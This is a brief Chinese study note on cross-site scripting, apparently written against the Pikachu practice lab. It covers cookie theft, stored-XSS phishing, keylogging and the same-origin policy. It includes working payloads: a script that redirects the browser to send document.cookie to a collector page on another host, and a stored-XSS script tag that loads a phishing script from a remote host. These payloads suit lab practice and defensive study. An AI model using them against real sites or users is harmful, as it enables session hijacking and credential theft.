漏洞.doc

cookie獲取xss後臺使用

   引起用戶點擊特製url（好比告訴用戶這是優惠網）,用戶點擊後進入攻擊者指定的本身的頁面，返回用戶的cookie到攻擊者的後臺

<script>

document .location='http://192.168.1.15/pkxss/xcookie/cookie.php?cookie='+ document.cookie;

</script>

 構造的url指定連接是後臺存儲cookiede頁面，頁面能夠重定向到其餘頁面，不引發用戶的懷疑

 

 

 

 

 

 

 

 

 

xss釣魚

代碼

 

在存在存儲型xss漏洞的留言板上輸入：<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>

xss獲取鍵盤記錄

 

同源策略：兩個不一樣域名之間（跨域）不能使用js進行相互操做。如需進行跨域操做，要進行特殊配置，好比經過：header(「Access-Control-Allow-Origin:x.com)  //容許被x.com跨域請求

下面這些標籤不受同源策略限制：

<script src=」..」>//js，加載到本地

<img src=」..」>

<link href=」..」>//css

<iframe src=」..」>//任意資源